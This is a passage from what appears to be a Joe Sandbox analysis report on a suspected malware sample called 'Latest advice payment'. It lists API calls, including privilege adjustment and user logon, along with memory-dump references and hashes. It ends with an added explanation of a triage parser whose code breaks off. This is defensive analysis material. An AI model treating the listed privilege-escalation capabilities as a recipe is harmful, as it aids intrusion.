                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CB343
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 005CB39D
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 005CB3EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: d623fa811e4e8dfd26a1f123c6f72b6c9355f0a54bd5e3a725ce4a2a1530aa72
                                                            • Instruction ID: 030daf0de168d844951030dd31c982d985e900b9a1fe428ae048eb89827cf7a3
                                                            • Opcode Fuzzy Hash: d623fa811e4e8dfd26a1f123c6f72b6c9355f0a54bd5e3a725ce4a2a1530aa72
                                                            • Instruction Fuzzy Hash: 31216075A00509EFCB00EFA5D885EEDBFB8FF89310F1480A9E945AB351DB31A915CB51
                                                            APIs
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005B882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005B8858
                                                            • GetLastError.KERNEL32 ref: 005B8865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: cf5aae26db3b0426f7bdab33ddfbf2f6047260d23d423caaf6e7371eefa03124
                                                            • Instruction ID: 8f3c753421e990bc07eb4d3ec989a5bfecc9ef410aa36d15f0ed624f4f346a66
                                                            • Opcode Fuzzy Hash: cf5aae26db3b0426f7bdab33ddfbf2f6047260d23d423caaf6e7371eefa03124
                                                            • Instruction Fuzzy Hash: AD1160B1414205AFE718EF54DC89D6BBBADFB44710B20952EF45697251DA30BC44CB60
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005B8774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005B878B
                                                            • FreeSid.ADVAPI32(?), ref: 005B879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 5341fa24532aee9b1799421abc3a998cba155e5a64b988b7a9e73f1108bc0872
                                                            • Instruction ID: 16256e48f37fc281a76dfb4e8b7e05e15557d37fdc0ecf7c4f1e13915b766d99
                                                            • Opcode Fuzzy Hash: 5341fa24532aee9b1799421abc3a998cba155e5a64b988b7a9e73f1108bc0872
                                                            • Instruction Fuzzy Hash: CEF04F7591130CFFDF04DFF4DC89ABDBBBCEF08211F1044A9A502E6181DA716A089B50
                                                            APIs
                                                            • __time64.LIBCMT ref: 005C889B
                                                              • Part of subcall function 0058520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,005C8F6E,00000000,?,?,?,?,005C911F,00000000,?), ref: 00585213
                                                              • Part of subcall function 0058520A: __aulldiv.LIBCMT ref: 00585233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0eb
                                                            • API String ID: 2893107130-1612489492
                                                            • Opcode ID: 845c1eb6eb562cbf8bb8ddfc0b5437cbd6ef897c336dffd49258ac2bd667f9c6
                                                            • Instruction ID: 547c4e9c502204ce46aa32193b86dd3a0a5895aeae2787f6f06579cb5e0438d7
                                                            • Opcode Fuzzy Hash: 845c1eb6eb562cbf8bb8ddfc0b5437cbd6ef897c336dffd49258ac2bd667f9c6
                                                            • Instruction Fuzzy Hash: B721A2326259108FC729CF65D841B62B7E1EFA5311B688E6CE4F5CB2C0CA74A906CB54
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005CC6FB
                                                            • FindClose.KERNEL32(00000000), ref: 005CC72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: a616da70c5af9774d530069ee01a50878a4a097acf9ba357b05f273bef8ccf76
                                                            • Instruction ID: 0f1aa6df494d4bb57c15beea7bce1a4ec304ab84806fab31e00b891485ea6807
                                                            • Opcode Fuzzy Hash: a616da70c5af9774d530069ee01a50878a4a097acf9ba357b05f273bef8ccf76
                                                            • Instruction Fuzzy Hash: BB11A5716002019FDB10DF29C889A2AFBE8FF85320F00851DF9A9C7290DB30AC05CF81
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,005D9468,?,005EFB84,?), ref: 005CA097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,005D9468,?,005EFB84,?), ref: 005CA0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 3dd53ec4cba98f7cead1aee0c49997efa3037c7332483b036b2d6412f35c8717
                                                            • Instruction ID: f2e78ab501562dcbe30e020ed00923436f0c126d9579cdc27fb145721d705f0c
                                                            • Opcode Fuzzy Hash: 3dd53ec4cba98f7cead1aee0c49997efa3037c7332483b036b2d6412f35c8717
                                                            • Instruction Fuzzy Hash: 9FF0823510522EABDB219FA4DC8CFEA7B6CFF08361F004569F909D7181DA309944CBA1
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005B8309), ref: 005B81E0
                                                            • CloseHandle.KERNEL32(?,?,005B8309), ref: 005B81F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 5db9ebbdbe401a29d75db5d6bf4a63a276e404edfe348ebc30fcdf60ba9365ba
                                                            • Instruction ID: d9b661636c710a52a80520a739feecda6eac1c3764ccbfb7e9d7a8c66d561d18
                                                            • Opcode Fuzzy Hash: 5db9ebbdbe401a29d75db5d6bf4a63a276e404edfe348ebc30fcdf60ba9365ba
                                                            • Instruction Fuzzy Hash: 6EE0EC72011611AFE7652B64EC09D777BEEFF44311714982DF8A6844B0DB62AC95EB10
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00588D57,?,?,?,00000001), ref: 0058A15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0058A163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 8a2d6fad10a7f0f3d3902022c06409f588cf1af2f233da1390c4b204e8aff146
                                                            • Instruction ID: bb6ed2a0c302fabb461d287870f44b5f36341ae83953a4fca074f9f04109e5c9
                                                            • Opcode Fuzzy Hash: 8a2d6fad10a7f0f3d3902022c06409f588cf1af2f233da1390c4b204e8aff146
                                                            • Instruction Fuzzy Hash: F8B09231054248ABCA042B91EC49B883F68EB58AA2F404420F64D88464CF625554AB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1712562a4f3ec31a165960fe620c2318c16a5111c330805919c31702d5835f7
                                                            • Instruction ID: 0977db3e8127631675e5e346b78e6236a02d83bea3f040f8efb40edf27a5a2f6
                                                            • Opcode Fuzzy Hash: f1712562a4f3ec31a165960fe620c2318c16a5111c330805919c31702d5835f7
                                                            • Instruction Fuzzy Hash: 1B32F221D29F454DD723A634D832336A649BFBB3D4F15D737EC1AB59A6EB28C4839200
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1360b22e177553d65d502c8ad8a68a10aa83536fc6754713e44b5a7b94c39ac
                                                            • Instruction ID: 5ee981cb6ea3688c4d83637ed01112cbb9436fa82b801f15b997a77be4be52a9
                                                            • Opcode Fuzzy Hash: e1360b22e177553d65d502c8ad8a68a10aa83536fc6754713e44b5a7b94c39ac
                                                            • Instruction Fuzzy Hash: 11B12360D2AF404DD72396388835336BB4CAFBB2C5F51DB1BFC1AB4D62EB2585879142
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 005C4C76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 4158b3b01c072bddd6d5c0fac4064d393d5b0676359db6958d829046caedbb59
                                                            • Instruction ID: 316ad170197aff5aaf488271eb3c8a7e811329253c73bd3a0a43d003535ef53e
                                                            • Opcode Fuzzy Hash: 4158b3b01c072bddd6d5c0fac4064d393d5b0676359db6958d829046caedbb59
                                                            • Instruction Fuzzy Hash: 37D05EA01222093DEE2C07A08DBFFFA1909F3C0781F84854E7281890E0E8D45C00AC34
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,005B8389), ref: 005B87D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 4d09e9db5f3764666bd458d0d8a766f68d1f06f85acb6f57cebeb2f2d5a2b985
                                                            • Instruction ID: 34c0d1cac4d917db1252c72e78da9e60101e8ae72e5cd1639a18ddcd4d030b99
                                                            • Opcode Fuzzy Hash: 4d09e9db5f3764666bd458d0d8a766f68d1f06f85acb6f57cebeb2f2d5a2b985
                                                            • Instruction Fuzzy Hash: 50D05E3226050EABEF018EA4DC05EAE3B69EB04B01F408111FE16C50A1C775D835AB60
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0058A12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 3d0b7d07434018448947006b59eb928cede8b1d7994ca7f616c8e58fe115e39f
                                                            • Instruction ID: 8d2efff2950d1db3bd90d99a56e5287fa4338ea425d12b8cff0fe07366b1068a
                                                            • Opcode Fuzzy Hash: 3d0b7d07434018448947006b59eb928cede8b1d7994ca7f616c8e58fe115e39f
                                                            • Instruction Fuzzy Hash: D8A0113000020CAB8A002B82EC08888BFACEA082A0B008020F80C880228B32A820AA80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4b49c42d14cdd4488dc9f2732b508fa3a2164bd756351cb6fe183aaefbf0b1c
                                                            • Instruction ID: 98ef145b7af8a34203634909c05a628c1a91cc0622eb0ba30e4c48074f598ad7
                                                            • Opcode Fuzzy Hash: d4b49c42d14cdd4488dc9f2732b508fa3a2164bd756351cb6fe183aaefbf0b1c
                                                            • Instruction Fuzzy Hash: 43222730948506CBDF3C8A28E49C7BCBFA1FF41314F28C46AD55A87592EB70AD91EB41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 454f209e6868f3f798f1b94ef0bd2b45ba54514d565c3165ba5df5ca2acd7f8a
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 64C1953620609309DF2D6639843513EFEA57EA27B171A4B5DDCB3EB1D4EE10C925D720
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 60610a1b3b3479ecb2cfdd5853777156fee485452e16c9de02e9952b50c50f75
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: 87C196322065930ADF2D663AC43513EBEA17EA27B171A476DDCB3EB1D4EE10C925D720
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: 66f7e0e1b458edca06715f6af8ade52a74d7b5183cdbe4c1131aa223cb78b39f
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 85C1943220649309DF2D5639C43513EBFA56EA27B131A4B6DDCB3EB1C4EE20C926D754
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: c1dc1370fe6b69314593bbebb3c2b0d97337fe4b4f8266ad57e8f0b3c3b86bce
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: 6141D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: 6c9019ed336f8aec8120dbc0b10b618d317567bb05cdf641f6aed7ac8ab33f02
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 9B018078A00209EFCB44DF99C5909AEF7F5FB48210B608599D859A7301D730AE41DB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: 9b9ee8713c6fa3aba8129de4561ecd8e1a83d45ecb580738efa8900363196e2d
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: C2018078A01109EFCB48DF99C9909AEF7F5FB48210F608599D849A7701D730AE41DB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
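The "APIs" bullets in the function records above all follow one fixed shape: `Name.MODULE(arg,arg,...), ref: address`, with `?` standing for an argument the analyzer could not resolve and the parentheses omitted when no arguments were recovered (as in `DestroyWindow.USER32 ref: 005D787B`). The Python below is an added example, not part of the Joe Sandbox report or its tooling: a parser for that shape plus a per-record triage summary (call count, address range of the referenced call sites, number of unresolved arguments, modules touched, and any API names an analyst would flag). The sample lines are copied verbatim from the AdjustTokenPrivileges and AutoIt window records in this report; the `TAGS` table is this example's own analyst heuristic and not a Joe Sandbox signature.

```python
import re

# One API bullet from a Joe Sandbox function record, e.g.
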